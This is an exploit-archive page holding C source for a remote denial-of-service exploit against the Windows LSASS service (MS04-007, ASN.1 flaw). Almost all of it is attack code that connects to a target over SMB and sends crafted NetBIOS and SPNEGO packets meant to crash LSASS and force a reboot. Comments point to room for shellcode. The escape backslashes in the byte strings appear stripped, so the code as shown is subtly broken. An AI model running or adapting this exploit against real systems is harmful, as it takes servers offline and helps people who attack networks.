[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007)
# Published : 2004-02-14
# Author : Christophe Devine
# Previous Title : Chatman <= 1.5.1 RC1 Broadcast Crash Exploit
# Next Title : MS Windows XP/2003 Samba Share Resource Exhaustion Exploit
/*
* MS04-007 Exploit LSASS.EXE Win2k Pro Remote Denial-of-Service
*
* Copyright (C) 2004 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
/*
* > MS04-007-dos.exe 10.0.0.1 445
* connect failed
*
* > nbtstat -A 10.0.0.1
* [..]
* SERVER3 <20> UNIQUE Registered
* [..]
* > MS04-007-dos.exe 10.0.0.1 139 SERVER3
* > MS04-007-dos.exe 10.0.0.1 139 SERVER3
* >
*
* if the exploit works, LSASS gets killed,
* and after 1mn the server reboots.
*
*/
//#define WIN32
#ifdef WIN32
#include <winsock2.h>
#include <windows.h>
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#include <stdio.h>
/****************************************************************/
unsigned char netbios_sess_req[] =
/* NetBIOS Session Request */
"x81x00x00x44"
"x20x45x45x45x46x45x47x45x42x46x46x45x4Dx46x45x43"
"x41x43x41x43x41x43x41x43x41x43x41x43x41x43x41x43"
"x41x00"
"x20x45x45x45x46x45x47x45x42x46x46x45x4Dx46x45x43"
"x41x43x41x43x41x43x41x43x41x43x41x43x41x43x41x41"
"x41x00";
/****************************************************************/
unsigned char negotiate_req[] =
/* NetBIOS Message Type + Length & SMB Header */
"x00x00x00xB3"
"xFFx53x4Dx42x72x00x00x00x00x08x01xC8x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x75x03x00x00x02x00"
/* Negotiate Protocol Request, actually sniffed from smbclient */
"x00x90x00x02x50x43x20x4Ex45x54x57x4Fx52x4Bx20x50"
"x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02x4Dx49x43x52"
"x4Fx53x4Fx46x54x20x4Ex45x54x57x4Fx52x4Bx53x20x31"
"x2Ex30x33x00x02x4Dx49x43x52x4Fx53x4Fx46x54x20x4E"
"x45x54x57x4Fx52x4Bx53x20x33x2Ex30x00x02x4Cx41x4E"
"x4Dx41x4Ex31x2Ex30x00x02x4Cx4Dx31x2Ex32x58x30x30"
"x32x00x02x44x4Fx53x20x4Cx41x4Ex4Dx41x4Ex32x2Ex31"
"x00x02x53x61x6Dx62x61x00x02x4Ex54x20x4Cx41x4Ex4D"
"x41x4Ex20x31x2Ex30x00x02x4Ex54x20x4Cx4Dx20x30x2E"
"x31x32x00";
/****************************************************************/
unsigned char setup_request[] =
/* NetBIOS Message Type + Length & SMB Header */
"x00x00xCCxCC"
"xFFx53x4Dx42x73x00x00x00x00x08x01xC8x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x75x03x00x00x03x00"
/* Session Setup AndX Request */
"x0CxFFx00x00x00xFFxFFx02x00x01x00x00x00x00x00xCC"
"xCCx00x00x00x00x5Cx00x00x80xCCxCC";
/* Security Blob: SPNEGO OID + ASN.1 stuff */
unsigned char security_blob[] =
/* Application Constructed Object + SPNEGO OID */
"x60x82xCCxCCx06x06x2Bx06x01x05x05x02"
/* negTokenInit + Constructed Sequence */
"xA0x82xCCxCCx30x82xCCxCC"
/* mechType: NTLMSSP OID */
"xA0x0Ex30x0Cx06x0Ax2Bx06x01x04x01x82x37x02x02x0A"
/* reqFlags that should trigger the overflow */
"xA1x05x23x03x03x01x07"
/* mechToken: NTLMSSP (room for shellcode here) */
"xA2x82xCCxCCx04x82xCCxCC"
"x4Ex54x4Cx4Dx53x53x50x00x01x00x00x00x15x02x08x60"
"x09x00x09x00x20x00x00x00x07x00x07x00x29x00x00x00"
"x57x4Fx52x4Bx47x52x4Fx55x50x44x45x46x41x55x4Cx54";
/* Native OS & LAN Manager */
unsigned char other_stuff[] =
"x00x55x00x6Ex00x69x00x78x00x00x00x53x00x61x00x6D"
"x00x62x00x61x00x00x00";
/****************************************************************/
int main( int argc, char *argv[] )
{
unsigned char buf[4096];
struct hostent *server_host;
struct sockaddr_in server_addr;
int i, len, server_fd, n1, n2, n3;
#ifdef WIN32
WSADATA wsa;
/* initialize windows sockets */
if( WSAStartup( MAKEWORD(2,0), &wsa ) )
{
fprintf( stderr, "WSAStartup failedn" );
return( 1 );
}
#endif
if( argc != 3 && argc != 4 )
{
fprintf( stderr, "usage: %s <target hostname> "
"<port> [netbios name]n",
argv[0] );
return( 1 );
}
/* resolve the server hostname and connect */
server_host = gethostbyname( argv[1] );
if( server_host == NULL )
{
fprintf( stderr, "gethostbyname(%s) failedn", argv[1] );
return( 1 );
}
memcpy( (void *) &server_addr.sin_addr,
(void *) server_host->h_addr,
server_host->h_length );
sscanf( argv[2], "%d", &i );
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons( (unsigned short) i );
server_fd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );
if( server_fd < 0 )
{
fprintf( stderr, "could not create socketn" );
return( 1 );
}
len = sizeof( server_addr );
if( connect( server_fd, (struct sockaddr *)
&server_addr, len ) < 0 )
{
fprintf( stderr, "connect failedn" );
return( 1 );
}
if( argc == 4 )
{
/* encode the Called NetBIOS Name */
len = sizeof( netbios_sess_req ) - 1;
memcpy( buf, netbios_sess_req, len );
memset( buf + 5, 'A', 32 );
for( i = 0; i < (int) strlen( argv[3] ); i++ )
{
buf[5 + i * 2] += argv[3][i] >> 4;
buf[6 + i * 2] += argv[3][i] & 15;
}
for( ; i < 16; i++ )
{
buf[5 + i * 2] += 0x20 >> 4;
buf[6 + i * 2] += 0x20 & 15;
}
/* 1. NetBIOS Session Request */
if( send( server_fd, buf, len, 0 ) != len )
{
fprintf( stderr, "send(NetBIOS Session Request) failedn" );
return( 1 );
}
if( recv( server_fd, buf, sizeof( buf ), 0 ) <= 0 )
{
fprintf( stderr, "recv(NetBIOS Session Response) failedn" );
return( 1 );
}
if( buf[0] == 0x83 )
{
fprintf( stderr, "NetBIOS Session rejected "
"(wrong NetBIOS name ?)n" );
return( 1 );
}
}
/* 2. Negotiate Protocol Request */
len = sizeof( negotiate_req ) - 1;
if( send( server_fd, negotiate_req, len, 0 ) != len )
{
fprintf( stderr, "send(Negotiate Protocol Request) failedn" );
return( 1 );
}
if( recv( server_fd, buf, sizeof( buf ), 0 ) <= 0 )
{
fprintf( stderr, "recv(Negotiate Protocol Response) failedn" );
return( 1 );
}
/* 3. Session Setup AndX Request */
memset( buf, 'A', sizeof( buf ) );
n1 = sizeof( setup_request ) - 1;
n2 = sizeof( security_blob ) - 1;
n3 = sizeof( other_stuff ) - 1;
memcpy( buf, setup_request, n1 );
memcpy( buf + n1, security_blob, n2 );
n2 += 2000; /* heap padding for shellcode */
memcpy( buf + n1 + n2, other_stuff, n3 );
len = n1 + n2 + n3;
buf[ 2] = ( ( len - 4 ) >> 8 ) & 0xFF; /* NetBIOS msg length */
buf[ 3] = ( ( len - 4 ) ) & 0xFF;
buf[51] = ( n2 ) & 0xFF; /* Security Blob Length */
buf[52] = ( n2 >> 8 ) & 0xFF;
buf[61] = ( ( n2 + n3 ) ) & 0xFF; /* Byte Count (BCC) */
buf[62] = ( ( n2 + n3 ) >> 8 ) & 0xFF;
buf[n1 + 2] = ( ( n2 - 4 ) >> 8 ) & 0xFF; /* ACO Length */
buf[n1 + 3] = ( ( n2 - 4 ) ) & 0xFF;
buf[n1 + 14] = ( ( n2 - 16 ) >> 8 ) & 0xFF; /* negTokenInit Length */
buf[n1 + 15] = ( ( n2 - 16 ) ) & 0xFF;
buf[n1 + 18] = ( ( n2 - 20 ) >> 8 ) & 0xFF; /* Constr. Seq. Length */
buf[n1 + 19] = ( ( n2 - 20 ) ) & 0xFF;
buf[n1 + 45] = ( ( n2 - 47 ) >> 8 ) & 0xFF; /* mechToken Length */
buf[n1 + 46] = ( ( n2 - 47 ) ) & 0xFF;
buf[n1 + 49] = ( ( n2 - 51 ) >> 8 ) & 0xFF; /* String Length */
buf[n1 + 50] = ( ( n2 - 51 ) ) & 0xFF;
if( send( server_fd, buf, len, 0 ) != len )
{
fprintf( stderr, "send(Session Setup AndX Request) failedn" );
return( 1 );
}
recv( server_fd, buf, sizeof( buf ), 0 );
shutdown( server_fd, 2 );
return( 0 );
}
// www.Syue.com [2004-02-14]